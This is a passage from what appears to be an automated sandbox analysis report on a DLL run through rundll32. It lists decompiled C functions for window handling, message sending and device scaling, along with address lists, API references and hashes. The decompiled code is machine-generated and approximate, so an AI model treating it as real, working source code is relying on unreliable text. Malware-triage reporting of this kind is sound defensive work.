				return E10039F21(_t49, _t67, _v8 ^ _t78, _t70, _t73, _t76);
			}























                                                                                                        0x1000aef1
                                                                                                        0x1000aef8
                                                                                                        0x1000aefc
                                                                                                        0x1000af07
                                                                                                        0x1000af08
                                                                                                        0x1000af09
                                                                                                        0x1000af0a
                                                                                                        0x1000af0b
                                                                                                        0x1000af10
                                                                                                        0x1000af13
                                                                                                        0x1000af16
                                                                                                        0x1000af24
                                                                                                        0x1000af18
                                                                                                        0x1000af21
                                                                                                        0x1000af21
                                                                                                        0x1000af28
                                                                                                        0x1000af3c
                                                                                                        0x1000af3f
                                                                                                        0x1000af30
                                                                                                        0x1000af39
                                                                                                        0x1000af39
                                                                                                        0x1000af44
                                                                                                        0x1000af4e
                                                                                                        0x1000af51
                                                                                                        0x1000af59
                                                                                                        0x1000af5c
                                                                                                        0x1000af6d
                                                                                                        0x1000af6f
                                                                                                        0x1000af8a
                                                                                                        0x1000af71
                                                                                                        0x1000af74
                                                                                                        0x1000af79
                                                                                                        0x1000af80
                                                                                                        0x1000af85
                                                                                                        0x1000af85
                                                                                                        0x1000af92
                                                                                                        0x1000afac
                                                                                                        0x1000af94
                                                                                                        0x1000af97
                                                                                                        0x1000af9b
                                                                                                        0x1000afa2
                                                                                                        0x1000afa7
                                                                                                        0x1000afb6
                                                                                                        0x1000afbb
                                                                                                        0x1000afc1
                                                                                                        0x1000afc1
                                                                                                        0x1000afc4
                                                                                                        0x1000afc7
                                                                                                        0x1000afc8
                                                                                                        0x1000afce
                                                                                                        0x1000afcf
                                                                                                        0x1000afd5
                                                                                                        0x1000afdb
                                                                                                        0x1000afdc
                                                                                                        0x1000afe2
                                                                                                        0x1000afe3
                                                                                                        0x1000afe6
                                                                                                        0x1000afec
                                                                                                        0x1000afec
                                                                                                        0x1000affd

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Global$lstrlen$AllocLockUnlock
                                                                                                        • String ID:
                                                                                                        • API String ID: 3485620298-0
                                                                                                        • Opcode ID: 5a2b1033ba73c5bb61b14befbb218131f41d0969be005bdc4a128b7dd6cb1a7f
                                                                                                        • Instruction ID: 369260ebea5939965125d5f8093323404d65087dd7dc36d773aedbdbd935e9b0
                                                                                                        • Opcode Fuzzy Hash: 5a2b1033ba73c5bb61b14befbb218131f41d0969be005bdc4a128b7dd6cb1a7f
                                                                                                        • Instruction Fuzzy Hash: 28411AB190020A9FDF41DFA4C884AAA7BF8FF09385F110165ED05AB205D775EA45CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1000F1EC, Relevance: 7.6, APIs: 5, Instructions: 81windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 97%
                                                                                                        			E1000F1EC(signed int __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags) {
				struct HWND__* _t29;
				signed int _t33;
				signed short _t37;
				signed int _t39;
				struct HWND__* _t54;
				void* _t55;
				void* _t56;

				_t56 = __eflags;
				_t43 = __ebx;
				_push(0x80);
				E1003EE82(0x1005382f, __ebx, __edi, __esi);
				 *(_t55 - 0x10) = __ecx;
				E10007A5B(_t55 - 0x38);
				_t46 = _t55 - 0x8c;
				E1000D09A(_t55 - 0x8c, _t56);
				 *(_t55 - 4) = 0;
				_t29 = GetTopWindow( *(__ecx + 0x20));
				while(1) {
					_t54 = _t29;
					if(_t54 == 0) {
						break;
					}
					 *(_t55 - 0x6c) = _t54;
					 *(_t55 - 0x34) = GetDlgCtrlID(_t54) & 0x0000ffff;
					 *((intOrPtr*)(_t55 - 0x24)) = _t55 - 0x8c;
					_t33 = E1000E60C(_t46, 0, _t54, __eflags, _t54);
					__eflags = _t33;
					if(_t33 == 0) {
						L3:
						_t46 =  *(_t55 - 0x10);
						__eflags = E100078E2(_t43,  *(_t55 - 0x10), _t54,  *(_t55 - 0x34), 0xffffffff, _t55 - 0x38, 0);
						if(__eflags == 0) {
							_t43 =  *(_t55 + 0xc);
							__eflags = _t43;
							if(_t43 != 0) {
								_t37 = SendMessageA( *(_t55 - 0x6c), 0x87, 0, 0);
								__eflags = _t37 & 0x00002000;
								if((_t37 & 0x00002000) == 0) {
									L10:
									_t43 = 0;
									__eflags = 0;
								} else {
									_t39 = E10011632(_t55 - 0x8c) & 0x0000000f;
									__eflags = _t39 - 3;
									if(_t39 == 3) {
										goto L10;
									} else {
										__eflags = _t39 - 6;
										if(_t39 == 6) {
											goto L10;
										} else {
											__eflags = _t39 - 7;
											if(_t39 == 7) {
												goto L10;
											} else {
												__eflags = _t39 - 9;
												if(_t39 == 9) {
													goto L10;
												}
											}
										}
									}
								}
							}
							_t46 = _t55 - 0x38;
							E10007A81(_t55 - 0x38,  *((intOrPtr*)(_t55 + 8)), _t43);
						}
					} else {
						_t46 = _t33;
						__eflags = E100078E2(_t43, _t33, _t54, 0, 0xbd11ffff, _t55 - 0x38, 0);
						if(__eflags == 0) {
							goto L3;
						}
					}
					_t29 = GetWindow(_t54, 2);
				}
				_t21 = _t55 - 4;
				 *(_t55 - 4) =  *(_t55 - 4) | 0xffffffff;
				 *(_t55 - 0x6c) = 0;
				return E1003EF21(E1000EED5(_t43, _t55 - 0x8c, 0, _t54,  *_t21));
			}










                                                                                                        0x1000f1ec
                                                                                                        0x1000f1ec
                                                                                                        0x1000f1ec
                                                                                                        0x1000f1f6
                                                                                                        0x1000f1fd
                                                                                                        0x1000f203
                                                                                                        0x1000f208
                                                                                                        0x1000f20e
                                                                                                        0x1000f218
                                                                                                        0x1000f21b
                                                                                                        0x1000f2cb
                                                                                                        0x1000f2cb
                                                                                                        0x1000f2cf
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000f227
                                                                                                        0x1000f233
                                                                                                        0x1000f23d
                                                                                                        0x1000f240
                                                                                                        0x1000f245
                                                                                                        0x1000f247
                                                                                                        0x1000f25f
                                                                                                        0x1000f25f
                                                                                                        0x1000f271
                                                                                                        0x1000f273
                                                                                                        0x1000f275
                                                                                                        0x1000f278
                                                                                                        0x1000f27a
                                                                                                        0x1000f286
                                                                                                        0x1000f28c
                                                                                                        0x1000f290
                                                                                                        0x1000f2b4
                                                                                                        0x1000f2b4
                                                                                                        0x1000f2b4
                                                                                                        0x1000f292
                                                                                                        0x1000f29d
                                                                                                        0x1000f2a0
                                                                                                        0x1000f2a3
                                                                                                        0x00000000
                                                                                                        0x1000f2a5
                                                                                                        0x1000f2a5
                                                                                                        0x1000f2a8
                                                                                                        0x00000000
                                                                                                        0x1000f2aa
                                                                                                        0x1000f2aa
                                                                                                        0x1000f2ad
                                                                                                        0x00000000
                                                                                                        0x1000f2af
                                                                                                        0x1000f2af
                                                                                                        0x1000f2b2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000f2b2
                                                                                                        0x1000f2ad
                                                                                                        0x1000f2a8
                                                                                                        0x1000f2a3
                                                                                                        0x1000f290
                                                                                                        0x1000f2ba
                                                                                                        0x1000f2bd
                                                                                                        0x1000f2bd
                                                                                                        0x1000f249
                                                                                                        0x1000f254
                                                                                                        0x1000f25b
                                                                                                        0x1000f25d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000f25d
                                                                                                        0x1000f2c5
                                                                                                        0x1000f2c5
                                                                                                        0x1000f2d5
                                                                                                        0x1000f2d5
                                                                                                        0x1000f2df
                                                                                                        0x1000f2ec

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$CtrlH_prolog3MessageSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 849854284-0
                                                                                                        • Opcode ID: 38a7cf8f352aa2a54155c01e95a1252c3d40d997d2a378c91caef02f7ebcc6ee
                                                                                                        • Instruction ID: 8762091eaa6030bd7be381a5a53b9ae70953d4528689b03b444658749c14eee8
                                                                                                        • Opcode Fuzzy Hash: 38a7cf8f352aa2a54155c01e95a1252c3d40d997d2a378c91caef02f7ebcc6ee
                                                                                                        • Instruction Fuzzy Hash: BC219139D00258AAEB11DFA0CC859BDBBB8FF55380F10421AF856E7499EF305E40EB60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 100138E7, Relevance: 7.6, APIs: 5, Instructions: 70windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 70%
                                                                                                        			E100138E7(void* __ecx, void* __ebp, unsigned int _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t20;
				void* _t21;
				void* _t23;
				void* _t34;
				void* _t35;
				struct HWND__* _t36;
				void* _t37;

				_t37 = __ebp;
				_t29 = __ecx;
				_t35 = __ecx;
				if((E10011632(__ecx) & 0x40000000) == 0) {
					_t29 = __ecx;
					_t34 = E1000F039(__ecx);
				} else {
					_t34 = __ecx;
				}
				_t41 = _t34;
				if(_t34 == 0) {
					E1000836F(0, _t29, _t34, _t35, _t41);
				}
				_push(_t37);
				if((_a4 & 0x0000000c) != 0) {
					_t23 = E1001175A(_t34);
					if(( !(_a4 >> 3) & 0x00000001) == 0 || _t23 == 0 || _t34 == _t35) {
						SendMessageA( *(_t34 + 0x20), 0x86, 0, 0);
					} else {
						 *(_t35 + 0x3c) =  *(_t35 + 0x3c) | 0x00000200;
						SendMessageA( *(_t34 + 0x20), 0x86, 1, 0);
						 *(_t35 + 0x3c) =  *(_t35 + 0x3c) & 0xfffffdff;
					}
				}
				_push(5);
				_push(GetDesktopWindow());
				while(1) {
					_t20 = GetWindow();
					_t36 = _t20;
					if(_t36 == 0) {
						break;
					}
					_t21 = E10013272( *(_t34 + 0x20), _t36);
					__eflags = _t21;
					if(_t21 != 0) {
						SendMessageA(_t36, 0x36d, _a4, 0);
					}
					_push(2);
					_push(_t36);
				}
				return _t20;
			}













                                                                                                        0x100138e7
                                                                                                        0x100138e7
                                                                                                        0x100138ea
                                                                                                        0x100138f6
                                                                                                        0x100138fc
                                                                                                        0x10013903
                                                                                                        0x100138f8
                                                                                                        0x100138f8
                                                                                                        0x100138f8
                                                                                                        0x10013907
                                                                                                        0x10013909
                                                                                                        0x1001390b
                                                                                                        0x1001390b
                                                                                                        0x10013915
                                                                                                        0x1001391c
                                                                                                        0x10013920
                                                                                                        0x10013931
                                                                                                        0x10013962
                                                                                                        0x1001393b
                                                                                                        0x1001393b
                                                                                                        0x1001394d
                                                                                                        0x1001394f
                                                                                                        0x1001394f
                                                                                                        0x10013931
                                                                                                        0x10013964
                                                                                                        0x10013972
                                                                                                        0x10013993
                                                                                                        0x10013993
                                                                                                        0x10013995
                                                                                                        0x10013999
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10013979
                                                                                                        0x1001397e
                                                                                                        0x10013980
                                                                                                        0x1001398e
                                                                                                        0x1001398e
                                                                                                        0x10013990
                                                                                                        0x10013992
                                                                                                        0x10013992
                                                                                                        0x1001399f

                                                                                                        APIs
                                                                                                          • Part of subcall function 10011632: GetWindowLongA.USER32 ref: 1001163D
                                                                                                        • SendMessageA.USER32 ref: 1001394D
                                                                                                        • SendMessageA.USER32 ref: 10013962
                                                                                                        • GetDesktopWindow.USER32 ref: 10013966
                                                                                                        • SendMessageA.USER32 ref: 1001398E
                                                                                                        • GetWindow.USER32(00000000), ref: 10013993
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSendWindow$DesktopLong
                                                                                                        • String ID:
                                                                                                        • API String ID: 2272707703-0
                                                                                                        • Opcode ID: c5351df0981a8f9e0f1cb21dc48b7f85837bff062359d9caf76a5fe6da3494e1
                                                                                                        • Instruction ID: dd73b784d881f3b841c37e14bf89774b85a44912a5d202968077c96401651001
                                                                                                        • Opcode Fuzzy Hash: c5351df0981a8f9e0f1cb21dc48b7f85837bff062359d9caf76a5fe6da3494e1
                                                                                                        • Instruction Fuzzy Hash: 2A11C4313007567BE625DA258C82F6E7B99FB40794F018129FA416D5E1DFB1ED808794
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1000D470, Relevance: 7.6, APIs: 5, Instructions: 70windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 60%
                                                                                                        			E1000D470(void* __ecx, int _a4, int _a8, RECT* _a12, RECT* _a16) {
				struct tagRECT _v20;
				int _t22;
				struct HWND__* _t23;
				struct HWND__* _t42;
				void* _t43;

				_t43 = __ecx;
				_t22 = IsWindowVisible( *(__ecx + 0x20));
				if(_t22 != 0 || _a12 != _t22 || _a16 != _t22) {
					_t23 = ScrollWindow( *(_t43 + 0x20), _a4, _a8, _a12, _a16);
				} else {
					_push(5);
					_push( *(_t43 + 0x20));
					while(1) {
						_t23 = GetWindow();
						_t42 = _t23;
						if(_t42 == 0) {
							break;
						}
						GetWindowRect(_t42,  &_v20);
						E10008D13(_t43,  &_v20);
						SetWindowPos(_t42, 0, _v20.left + _a4, _v20.top + _a8, 0, 0, 0x15);
						_push(2);
						_push(_t42);
					}
				}
				if( *((intOrPtr*)(_t43 + 0x4c)) != 0 && _a12 == 0) {
					return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t43 + 0x4c)))) + 0x5c))(_a4, _a8);
				}
				return _t23;
			}








                                                                                                        0x1000d479
                                                                                                        0x1000d47e
                                                                                                        0x1000d486
                                                                                                        0x1000d4f1
                                                                                                        0x1000d492
                                                                                                        0x1000d498
                                                                                                        0x1000d49a
                                                                                                        0x1000d4d8
                                                                                                        0x1000d4d8
                                                                                                        0x1000d4da
                                                                                                        0x1000d4de
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000d4a4
                                                                                                        0x1000d4b0
                                                                                                        0x1000d4cf
                                                                                                        0x1000d4d5
                                                                                                        0x1000d4d7
                                                                                                        0x1000d4d7
                                                                                                        0x1000d4e0
                                                                                                        0x1000d4fb
                                                                                                        0x00000000
                                                                                                        0x1000d510
                                                                                                        0x1000d517

                                                                                                        APIs
                                                                                                        • IsWindowVisible.USER32 ref: 1000D47E
                                                                                                        • GetWindowRect.USER32 ref: 1000D4A4
                                                                                                        • SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000015,?), ref: 1000D4CF
                                                                                                        • GetWindow.USER32(00000005,00000005), ref: 1000D4D8
                                                                                                        • ScrollWindow.USER32 ref: 1000D4F1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$RectScrollVisible
                                                                                                        • String ID:
                                                                                                        • API String ID: 2639402888-0
                                                                                                        • Opcode ID: de1e536205bd9ae399f0021d43844fc4f823050e254a6ed550c112e73ab88896
                                                                                                        • Instruction ID: af533430d1b0bd8e605d2e50cf64afe7c61b44704b8a1de1178095635678027e
                                                                                                        • Opcode Fuzzy Hash: de1e536205bd9ae399f0021d43844fc4f823050e254a6ed550c112e73ab88896
                                                                                                        • Instruction Fuzzy Hash: D421583220061ABFEB21DF54CC84AAF77B9FB48395F00842AFA4592160E770AE11DB61
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 100260EB, Relevance: 7.6, APIs: 5, Instructions: 67windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 83%
                                                                                                        			E100260EB(void* __eflags, struct HWND__* _a4, int _a8, signed int* _a12) {
				void* __ebx;
				struct HWND__* _t28;
				void* _t35;
				intOrPtr* _t42;

				_t42 = _a4;
				E1002605D(_t35, _t42, _a8);
				E100115B7( *((intOrPtr*)(_t42 + 4)), _a8,  &_a4);
				if( *_t42 != 0) {
					 *_a12 =  *_a12 | 0xffffffff;
				}
				_a8 = 0;
				L3:
				L3:
				if((SendMessageA(_a4, 0x87, 0, 0) & 0x00000040) != 0) {
					_push(0);
					if( *_t42 == 0) {
						SendMessageA(_a4, 0xf1, 0 | _a8 ==  *_a12, ??);
					} else {
						if(SendMessageA(_a4, 0xf0, 0, ??) != 0) {
							 *_a12 = _a8;
						}
					}
					_a8 = _a8 + 1;
				}
				_t28 = GetWindow(_a4, 2);
				_a4 = _t28;
				if(_t28 == 0) {
					goto L11;
				}
				_t28 = GetWindowLongA(_t28, 0xfffffff0);
				if((_t28 & 0x00020000) == 0) {
					goto L3;
				}
				L11:
				return _t28;
			}







                                                                                                        0x100260f1
                                                                                                        0x100260f9
                                                                                                        0x10026108
                                                                                                        0x10026111
                                                                                                        0x10026116
                                                                                                        0x10026116
                                                                                                        0x1002611f
                                                                                                        0x00000000
                                                                                                        0x10026122
                                                                                                        0x10026130
                                                                                                        0x10026134
                                                                                                        0x10026135
                                                                                                        0x10026166
                                                                                                        0x10026137
                                                                                                        0x10026144
                                                                                                        0x1002614c
                                                                                                        0x1002614c
                                                                                                        0x10026144
                                                                                                        0x10026168
                                                                                                        0x10026168
                                                                                                        0x10026170
                                                                                                        0x10026178
                                                                                                        0x1002617b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10026180
                                                                                                        0x1002618b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10026191
                                                                                                        0x10026191

                                                                                                        APIs
                                                                                                          • Part of subcall function 100115B7: GetDlgItem.USER32 ref: 100115C4
                                                                                                        • SendMessageA.USER32 ref: 1002612C
                                                                                                        • SendMessageA.USER32 ref: 10026140
                                                                                                        • SendMessageA.USER32 ref: 10026166
                                                                                                        • GetWindow.USER32(?,00000002), ref: 10026170
                                                                                                        • GetWindowLongA.USER32 ref: 10026180
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Window$ItemLong
                                                                                                        • String ID:
                                                                                                        • API String ID: 1613074769-0
                                                                                                        • Opcode ID: ac836804c5819b89763a2c198cdd7b7ced236cba3b2f933886bbc518ad60361d
                                                                                                        • Instruction ID: 7cdf8fb39533faa8e1545ce2786c1c6102a7056552ed4c36b4998f31c91876fc
                                                                                                        • Opcode Fuzzy Hash: ac836804c5819b89763a2c198cdd7b7ced236cba3b2f933886bbc518ad60361d
                                                                                                        • Instruction Fuzzy Hash: 38113A7560021AFFEF008F50DC81EAA7B69EF453A4F548125FD199A2A1C730ED61DF60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 100121B1, Relevance: 7.6, APIs: 5, Instructions: 59windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E100121B1(void* __ecx, signed short _a4, signed short _a8, signed short _a12, signed short _a16) {
				signed short _t24;
				unsigned int _t34;
				void* _t46;

				_t46 = __ecx;
				if(IsWindow( *(__ecx + 0x20)) == 0) {
					 *(_t46 + 0xac) = _a4;
					 *(_t46 + 0xb0) = _a8;
					 *(_t46 + 0xa4) = _a12;
					_t24 = _a16;
					 *(_t46 + 0xa8) = _t24;
					return _t24;
				}
				SendMessageA( *(_t46 + 0x20), 0x420, 0, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
				SendMessageA( *(_t46 + 0x20), 0x41f, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff);
				if( *0x10071880 >= 0x60000) {
					_t34 = SendMessageA( *(_t46 + 0x20), 0x43a, 0, 0);
					 *(_t46 + 0xac) = _t34 & 0x0000ffff;
					 *(_t46 + 0xb0) = _t34 >> 0x10;
				}
				return InvalidateRect( *(_t46 + 0x20), 0, 1);
			}






                                                                                                        0x100121b5
                                                                                                        0x100121c2
                                                                                                        0x1001223d
                                                                                                        0x10012246
                                                                                                        0x1001224f
                                                                                                        0x10012255
                                                                                                        0x10012258
                                                                                                        0x00000000
                                                                                                        0x10012258
                                                                                                        0x100121e5
                                                                                                        0x100121fe
                                                                                                        0x1001220a
                                                                                                        0x10012216
                                                                                                        0x1001221e
                                                                                                        0x10012224
                                                                                                        0x10012224
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$InvalidateRectWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 3225880595-0
                                                                                                        • Opcode ID: 2c95d48c81d6bf34d1f12587b3bd2bba49f3c34484c88fdfea9f65f913444163
                                                                                                        • Instruction ID: 5450d3fd6f6ed9012d5be3e1a5a1166e0e22c885d66a395389b2f99e4ac93a3b
                                                                                                        • Opcode Fuzzy Hash: 2c95d48c81d6bf34d1f12587b3bd2bba49f3c34484c88fdfea9f65f913444163
                                                                                                        • Instruction Fuzzy Hash: DB1119B1200318AFE7108F29CC80ABBB7E9FB48345F00452EF9DAD6160E7B0AD50DB61
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 100216BF, Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 82%
                                                                                                        			E100216BF(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t22;
				int _t32;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t22 =  *0x10099128; // 0x60
					_t12 =  *0x1009912c; // 0x60
					goto L6;
				} else {
					_t32 = GetMapMode( *(__ecx + 8));
					if(_t32 >= 7 || _t32 == 1) {
						_t22 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, 0x9ec, _t22);
						_t14 = MulDiv(_t36[1], 0x9ec, _v8);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E10008DF4(__ecx, _a4);
						_push(_t32);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}









                                                                                                        0x100216c2
                                                                                                        0x100216c5
                                                                                                        0x100216ca
                                                                                                        0x10021716
                                                                                                        0x1002171c
                                                                                                        0x00000000
                                                                                                        0x100216cc
                                                                                                        0x100216d5
                                                                                                        0x100216da
                                                                                                        0x10021710
                                                                                                        0x10021712
                                                                                                        0x10021721
                                                                                                        0x10021721
                                                                                                        0x10021733
                                                                                                        0x1002173b
                                                                                                        0x10021741
                                                                                                        0x10021743
                                                                                                        0x100216e1
                                                                                                        0x100216e3
                                                                                                        0x100216e7
                                                                                                        0x100216ef
                                                                                                        0x100216f6
                                                                                                        0x100216f9
                                                                                                        0x100216f9
                                                                                                        0x100216da
                                                                                                        0x1002174a

                                                                                                        APIs
                                                                                                        • GetMapMode.GDI32(?,00000000,?,?,?,?,10021764,?,?,?,10004AA0,?,?,?,?,?), ref: 100216CF
                                                                                                        • GetDeviceCaps.GDI32(?,00000058), ref: 10021709
                                                                                                        • GetDeviceCaps.GDI32(?,0000005A), ref: 10021712
                                                                                                          • Part of subcall function 10008DF4: MulDiv.KERNEL32(?,00000000,00000000), ref: 10008E34
                                                                                                          • Part of subcall function 10008DF4: MulDiv.KERNEL32(?,00000000,00000000), ref: 10008E51
                                                                                                        • MulDiv.KERNEL32(?,000009EC,00000060), ref: 10021736
                                                                                                        • MulDiv.KERNEL32(?,000009EC,?), ref: 10021741
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CapsDevice$Mode
                                                                                                        • String ID:
                                                                                                        • API String ID: 696222070-0
                                                                                                        • Opcode ID: f1748aea756ef58c239055301fc4019a9ace941d9e2431e06909099bac9919c8
                                                                                                        • Instruction ID: 8fc3245c16c7d2604328c5ebbaed59c8368981f0c9b29448464012318c201f26
                                                                                                        • Opcode Fuzzy Hash: f1748aea756ef58c239055301fc4019a9ace941d9e2431e06909099bac9919c8
                                                                                                        • Instruction Fuzzy Hash: A311C239600614AFDB21AF69CC88C4EBBF9FF987507110419FA8697361C771AD018F80
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 100296F9, Relevance: 7.6, APIs: 5, Instructions: 53stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 94%
